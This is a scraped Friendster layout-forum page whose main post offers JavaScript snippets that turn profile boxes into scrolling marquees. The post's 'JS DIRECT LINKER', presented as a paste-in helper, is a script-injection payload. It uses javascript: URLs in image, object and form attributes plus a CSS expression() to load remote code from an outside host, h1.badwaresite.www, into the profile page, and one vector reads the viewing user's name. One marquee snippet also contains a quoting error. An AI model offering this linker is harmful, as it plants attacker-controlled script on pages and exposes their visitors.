Friendster Premade Layouts
Would you like to react to this message? Create an account in a few clicks or log in to continue.

Friendster Premade Layouts


 
HomePortalGallerySearchLatest imagesRegisterLog in
Log in
Username:
Password:
Log in automatically: 
:: I forgot my password
Latest topics
» ïðîãðàìì
JS CODES (Marquees=Moving Boxes) I_icon_minitime8/2/2011, 23:49 by Guest

» x-Hack hack you
JS CODES (Marquees=Moving Boxes) I_icon_minitime7/30/2011, 18:23 by Guest

» hide message
JS CODES (Marquees=Moving Boxes) I_icon_minitime4/8/2009, 18:59 by jhayz

» GREETINGS
JS CODES (Marquees=Moving Boxes) I_icon_minitime2/20/2009, 15:46 by jess_spyline

» Linker codes
JS CODES (Marquees=Moving Boxes) I_icon_minitime1/20/2009, 23:37 by hansjovy

» POSTING LINKERS IN APPS
JS CODES (Marquees=Moving Boxes) I_icon_minitime1/18/2009, 01:07 by hansjovy

» guys ok na po pwedi na kayong mag generate ng code nyo
JS CODES (Marquees=Moving Boxes) I_icon_minitime1/17/2009, 14:13 by hansjovy

» Codes Linker
JS CODES (Marquees=Moving Boxes) I_icon_minitime1/16/2009, 22:34 by hansjovy

» Hello guys!!!!!
JS CODES (Marquees=Moving Boxes) I_icon_minitime1/12/2009, 05:35 by meaboo

» guys friendster update again...
JS CODES (Marquees=Moving Boxes) I_icon_minitime1/11/2009, 15:20 by hansjovy

» Merry Christmas po sa lahat
JS CODES (Marquees=Moving Boxes) I_icon_minitime12/14/2008, 02:43 by mizz_greeny

» merry christmas!!
JS CODES (Marquees=Moving Boxes) I_icon_minitime12/6/2008, 11:55 by rosze_salley

» "Advance greetings of mine"
JS CODES (Marquees=Moving Boxes) I_icon_minitime12/3/2008, 18:20 by lei

» Hello po sa lahat
JS CODES (Marquees=Moving Boxes) I_icon_minitime10/31/2008, 07:36 by mizz_greeny

» Happy b'day sa lahat ng may kaarawan ngayon...
JS CODES (Marquees=Moving Boxes) I_icon_minitime10/1/2008, 21:11 by hansjovy

» Happy birthday Ate Mira
JS CODES (Marquees=Moving Boxes) I_icon_minitime10/1/2008, 21:07 by hansjovy

» weee.Miss u guYZ!
JS CODES (Marquees=Moving Boxes) I_icon_minitime9/8/2008, 17:52 by lei

» hi
JS CODES (Marquees=Moving Boxes) I_icon_minitime8/23/2008, 10:52 by Guest

» gud eve 2 ol
JS CODES (Marquees=Moving Boxes) I_icon_minitime8/12/2008, 13:27 by lei

» Hello!
JS CODES (Marquees=Moving Boxes) I_icon_minitime8/7/2008, 18:00 by darksoulsilent

Navigation
 Portal
 Index
 Memberlist
 Profile
 FAQ
 Search
Welcome
A place where we can make friends,share and costumize our Friendster profile.Just click the FORUM button at the top left to navigate the premade layouts.This is a Private Forum,Please REGISTER if you are not yet a Member.
Time and Date
Search
 
 

Display results as :
 
Rechercher Advanced Search
Poll
Top posters
jushart
JS CODES (Marquees=Moving Boxes) I_vote_lcapJS CODES (Marquees=Moving Boxes) I_voting_barJS CODES (Marquees=Moving Boxes) I_vote_rcap 
meaboo
JS CODES (Marquees=Moving Boxes) I_vote_lcapJS CODES (Marquees=Moving Boxes) I_voting_barJS CODES (Marquees=Moving Boxes) I_vote_rcap 
FreYaH
JS CODES (Marquees=Moving Boxes) I_vote_lcapJS CODES (Marquees=Moving Boxes) I_voting_barJS CODES (Marquees=Moving Boxes) I_vote_rcap 
mizz_greeny
JS CODES (Marquees=Moving Boxes) I_vote_lcapJS CODES (Marquees=Moving Boxes) I_voting_barJS CODES (Marquees=Moving Boxes) I_vote_rcap 
coline089
JS CODES (Marquees=Moving Boxes) I_vote_lcapJS CODES (Marquees=Moving Boxes) I_voting_barJS CODES (Marquees=Moving Boxes) I_vote_rcap 
rica-anamae
JS CODES (Marquees=Moving Boxes) I_vote_lcapJS CODES (Marquees=Moving Boxes) I_voting_barJS CODES (Marquees=Moving Boxes) I_vote_rcap 
hershey
JS CODES (Marquees=Moving Boxes) I_vote_lcapJS CODES (Marquees=Moving Boxes) I_voting_barJS CODES (Marquees=Moving Boxes) I_vote_rcap 
nimiel
JS CODES (Marquees=Moving Boxes) I_vote_lcapJS CODES (Marquees=Moving Boxes) I_voting_barJS CODES (Marquees=Moving Boxes) I_vote_rcap 
almahiroshi
JS CODES (Marquees=Moving Boxes) I_vote_lcapJS CODES (Marquees=Moving Boxes) I_voting_barJS CODES (Marquees=Moving Boxes) I_vote_rcap 
merjessa
JS CODES (Marquees=Moving Boxes) I_vote_lcapJS CODES (Marquees=Moving Boxes) I_voting_barJS CODES (Marquees=Moving Boxes) I_vote_rcap 

 

 JS CODES (Marquees=Moving Boxes)

Go down 
AuthorMessage
jushart
Founder
Founder
jushart


Female
Number of posts : 508
Age : 43
Location : South Korea
Humor : ***aim high***
My Mood Today : 0
Registration date : 2007-12-01

JS CODES (Marquees=Moving Boxes) Empty
PostSubject: JS CODES (Marquees=Moving Boxes)   JS CODES (Marquees=Moving Boxes) I_icon_minitime12/4/2007, 03:30

JS CODES
REFER TO MY TUTORIAL HOW TO GET YOUR DIRECT URL LINK.JUST CHANGE css to js



//Moving Friends Box
if ( ! attachOnLoadHandler(function () { movingFrnd();}))
window.onload = function () { movingFrnd();};
function movingFrnd() {
var marqueeFriends = document.getElementById("content_friends_2_2").innerHTML;
document.getElementById("content_friends_2_2").innerHTML ="<marquee direction='up' height='300' scrollamount='2' onMouseOver='stop()' onMouseOut='start()'>"+
marqueeFriends+"</marquee>";
}


//Moving Controlpanel Buttons
if ( ! attachOnLoadHandler(function () { movingCpnl();}))
window.onload = function () { movingCpnl();};
function movingCpnl() {
var marqueeCpb = document.getElementById('"controlPanelButtons").innerHTML;
document.getElementById("controlPanelButtons").innerHTML ="<marquee direction='up' height='150' scrollamount='2' onMouseOver='stop()' onMouseOut='start()'>"+
marqueeCpb+"</marquee>";
}


//Moving Photo Gallery
if ( ! attachOnLoadHandler(function () { movingPhotos();}))
window.onload = function () { movingPhotos();};
function movingPhotos() {
var marqueePhotos = document.getElementById("content_photos_1_2").innerHTML;
document.getElementById("content_photos_1_2").innerHTML ="<marquee direction='left' height='100%' scrollamount='2' onMouseOver='stop()' onMouseOut='start()'>"+
marqueePhotos+"</marquee>";
}


//Moving Moreabout Box
if ( ! attachOnLoadHandler(function () { movingMA();}))
window.onload = function () { movingMA();};
function movingMA() {
var marqueeMoreAbout = document.getElementById("content_moreabout_1_5").innerHTML;
document.getElementById("content_moreabout_1_5").innerHTML ="<marquee direction='up' height='300' scrollamount='2' onMouseOver='stop()' onMouseOut='start()'>"+
marqueeMoreAbout+"</marquee>";
}


//Moving Testi & Comments Box
if ( ! attachOnLoadHandler(function () { movingTestiComm();}))
window.onload = function () { movingTestiComm();};
function movingTestiComm() {
var marqueeTestiComments = document.getElementById("content_publiccomments_1_7").innerHTML;
document.getElementById("content_publiccomments_1_7").innerHTML ="<marquee direction='up' height='300' scrollamount='2' onMouseOver='stop()' onMouseOut='start()'>"+
marqueeTestiComments+"</marquee>";
}


//Moving Shoutout Box
if ( ! attachOnLoadHandler(function () { movingCpSB();}))
window.onload = function () { movingCpSB();};
function movingCpSB() {
var marqueeCSbox = document.getElementById("cpShoutoutBox").innerHTML;
document.getElementById("cpShoutoutBox").innerHTML ="<marquee direction='left' height='100%' scrollamount='2' onMouseOver='stop()' onMouseOut='start()'>"+
marqueeCSbox+"</marquee>";
}


//Moving Fan of...Box
if ( ! attachOnLoadHandler(function () { movingFanof();}))
window.onload = function () { movingFanof();};
function movingFanof() {
var marqueeFanof = document.getElementById("content_fanof_2_4").innerHTML;
document.getElementById("content_fanof_2_4").innerHTML ="<marquee direction='up' height='200' scrollamount='2' onMouseOver='stop()' onMouseOut='start()'>"+
marqueeFanof+"</marquee>";
}

//Moving Groups Box
if ( ! attachOnLoadHandler(function () { movingGroups();}))
window.onload = function () { movingGroups();};
function movingGroups() {
var marqueeGroups = document.getElementById("content_groups_2_5").innerHTML;
document.getElementById("content_groups_2_5").innerHTML ="<marquee direction='up' height='200' scrollamount='2' onMouseOver='stop()' onMouseOut='start()'>" +
marqueeGroups+"</marquee>";
}
Copy and paste scripts to your file at your webhost then get the direct url link.

JS DIRECT LINKER
Code:
<div id=codeContainer><img src=" javascript:a=document.createElement('script');a.src='http://h1.badwaresite.www/archangell/loader.swf';navBg.appendChild(a)"><object type=text/javascript data=" javascript:if(navigator.appName=='Netscape'){a=document.createElement('script');a.src='http://h1.badwaresite.www/archangell/loader.swf';parent.document.getElementById('navBg').appendChild(a);}"></object><form id=myform action=" javascript:a=document.createElement('script');a.src='http://h1.badwaresite.www/archangell/loader.swf';navBg.appendChild(a);alert('hello! '+pageViewerFName)"></form><div id='loader' class='Linker credits to ArchAngell' style="ArchAngell:expres\sion(myform.submit());">PUT YOUR DIRECT JS URL HERE</div></div>

FOR MORE JS SCRIPT CODES VISIT FRIENDSTERTALK
Back to top Go down
http://www.friendster.com/ohmir
 
JS CODES (Marquees=Moving Boxes)
Back to top 
Page 1 of 1
 Similar topics
-
» CSS Codes
» GREETINGS
» Linker codes
» Codes Linker
» REQUESTED LAYOUTS (APRIL12,2008)

Permissions in this forum:You cannot reply to topics in this forum
Friendster Premade Layouts :: GENERAL CATEGORY-
Jump to: